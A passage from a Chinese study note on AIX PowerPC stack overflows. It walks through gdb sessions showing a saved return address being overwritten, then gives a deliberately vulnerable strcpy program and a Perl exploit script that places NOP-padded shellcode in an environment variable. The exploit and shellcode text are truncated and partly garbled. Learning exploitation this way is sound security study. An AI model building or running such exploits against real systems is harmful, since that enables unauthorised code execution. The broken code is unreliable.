AIX PowerPC体系结构及其溢出技术学习笔记(3)

0x10000584 : blr 0x10000588 : .long 0x0 0x1000058c : .long 0x2061 0x10000590 : lwz r0,1(r1) 0x10000594 : .long 0x3c 0x10000598 : .long 0x46d61 0x1000059c : xori r14,r11,7936 End of assembler dump. (gdb) b main

Breakpoint 1 at 0x10000560 (gdb) r

The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /home/san/simple_overflow

Breakpoint 1, 0x10000560 in main () (gdb) display/i $pc

1: x/i $pc 0x10000560 : addi r3,r31,56 (gdb) x/20x $r1

0x2ff22b58: 0x2ff22bb0 0x00000000 0x00000000 0x00000000 0x2ff22b68: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22b78: 0x00000000 0x00000000 0x00000000 0x00000001 0x2ff22b88: 0x00000000 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x2ff22b98: 0xdeadbeef 0xdeadbeef 0x20000460 0x10000000 (gdb)

0x2ff22ba8: 0x00000003 0x20000460 0x00000000 0x44222802 0x2ff22bb8: 0x100001cc 0x00000000 0x00000000 0x20000e70 0x2ff22bc8: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22bd8: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22be8: 0x00000000 0x00000000 0x00000000 0x00000000

0x2ff22b58是当前的堆栈指针，它指向的地址是前一个栈帧（0x2ff22bb0）。从堆栈内容来看，前一个栈帧保存的lr是0x100001cc，也就是说main函数退出后会执行到这个地址，先来看程序流程：

(gdb) until *0x1000056c 0x1000056c in main ()

1: x/i $pc 0x1000056c : nop (gdb) i reg

r0 0x20 32

r1 0x2ff22b58 804399960 r2 0x20000e70 536874608 r3 0x2ff22b90 804400016 r4 0x20000534 536872244 r5 0x2ff22bbc 804400060

r6 0x0 0 r7 0x0 0 r8 0x0 0

r9 0x80808080 -2139062144 r10 0x7f7f7f7f 2139062143 r11 0x4 4

r12 0x80808080 -2139062144 r13 0xdeadbeef -559038737 r14 0x1 1

r15 0x2ff22c00 804400128 r16 0x2ff22c08 804400136 r17 0x0 0

r18 0xdeadbeef -559038737 r19 0xdeadbeef -559038737 r20 0xdeadbeef -559038737 r21 0xdeadbeef -559038737 r22 0xdeadbeef -559038737 r23 0xdeadbeef -559038737 r24 0xdeadbeef -559038737 r25 0xdeadbeef -559038737 r26 0xdeadbeef -559038737 r27 0xdeadbeef -559038737 r28 0x20000460 536872032 r29 0x10000000 268435456 r30 0x3 3

r31 0x2ff22b58 804399960 pc 0x1000056c 268436844 ps 0x2d032 184370

cr 0x22222842 572663874 lr 0x1000056c 268436844 ctr 0x4 4 xer 0x0 0 fpscr 0x0 0 vscr 0x0 0 vrsave 0x0 0 (gdb) x/20x $r1

0x2ff22b58: 0x2ff22bb0 0x00000000 0x00000000 0x00000000 0x2ff22b68: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22b78: 0x00000000 0x00000000 0x00000000 0x00000001 0x2ff22b88: 0x00000000 0xdeadbeef 0x31323334 0x35313233 0x2ff22b98: 0x34353132 0x33343531 0x32333435 0x31323334 (gdb)

0x2ff22ba8: 0x3d505245 0x53455256 0x45445350 0x4143453d 0x2ff22bb8: 0x41424344 0x00000000 0x00000000 0x20000e70

0x2ff22bc8: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22bd8: 0x00000000 0x00000000 0x00000000 0x00000000 0x2ff22be8: 0x00000000 0x00000000 0x00000000 0x00000000

strcpy已经完成，前一个栈帧保存lr寄存器的内容已经改写成0x41424344，接着看程序流程： (gdb) ni

0x10000570 in main ()

1: x/i $pc 0x10000570 : mr r3,r0 (gdb)

0x10000574 in main ()

1: x/i $pc 0x10000574 : lwz r1,0(r1) (gdb)

0x10000578 in main ()

1: x/i $pc 0x10000578 : lwz r0,8(r1) (gdb)

0x1000057c in main ()

1: x/i $pc 0x1000057c : mtlr r0 (gdb)

0x10000580 in main ()

1: x/i $pc 0x10000580 : lwz r31,-4(r1) (gdb)

0x10000584 in main ()

1: x/i $pc 0x10000584 : blr (gdb)

这几步指令的功能在前面已经说过了，就是main函数在退出的时候会切换到前一个栈帧，并且把r1+8的内容保存到lr寄存器，然后跳到lr寄存器执行。

五、学习如何攻击AIX PowerPC的溢出程序

了解了溢出流程后，我们可以来试试如何写攻击程序：

-bash-2.05b$ cat vulnerable.c /* vulnerable.c *

* Vulnerable program on the PowerPC architecture. */

#include #include

int main (int argc, char *argv[]) {

char vulnbuff[16];

strcpy (vulnbuff, argv[1]); printf (\ getchar(); /* for debug */ }

-bash-2.05b$ gcc -o vulnerable vulnerable.c

AIX和其它架构的操作系统一样，也有USER_UPPER（栈底），它的地址是0x2ff22fff，大致的堆栈结构如下：

栈底

+----------------+ 0x2ff22fff | 保留 | +----------------+ | 环境变量 | +----------------+ | 执行文件参数 | +----------------+ |执行文件绝对路径| +----------------+ | 栈帧 | SP --->+----------------+ | 堆栈增长方向 | . | . . v .

我们能够比较准确的猜测环境变量的地址，参考前面的调试流程和watercloud的一些AIX攻击程序，想当然的写一个攻击程序：

-bash-2.05b$ cat exploit.pl #!/usr/bin/perl #

# exploit.pl

# exploit program vulnerable

$CMD=\

$SHELLCODE=

\ \ \ \ \ \

\ \ \ \ \ \ \ \

$NOP=\%ENV=();

$ENV{CCC}=$NOP.$SHELLCODE;

$ret=system $CMD ,\

调试一下：

-bash-2.05b$ ./exploit.pl

/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@/ò+@

在另一个终端用gdb调试vulnerable：

-bash-2.05b$ ps aux|grep vul

san 47644 0.0 0.0 208 220 pts/1 A 22:16:24 0:00 grep vul

san 44544 0.0 0.0 96 304 pts/0 A 22:16:02 0:00 /home/san/vulnera -bash-2.05b$ gdb vulnerable 44544 GNU gdb 6.1

Copyright 2004 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type \

There is absolutely no warranty for GDB. Type \This GDB was configured as \Attaching to program: /home/san/vulnerable, process 44544 0xd01ea254 in read () from /usr/lib/libc.a(shr.o) (gdb) disas main

Dump of assembler code for function main: 0x10000544 : mflr r0

0x10000548 : stw r31,-4(r1) 0x1000054c : stw r0,8(r1) 0x10000550 : stwu r1,-88(r1) 0x10000554 : mr r31,r1 0x10000558 : stw r3,112(r31)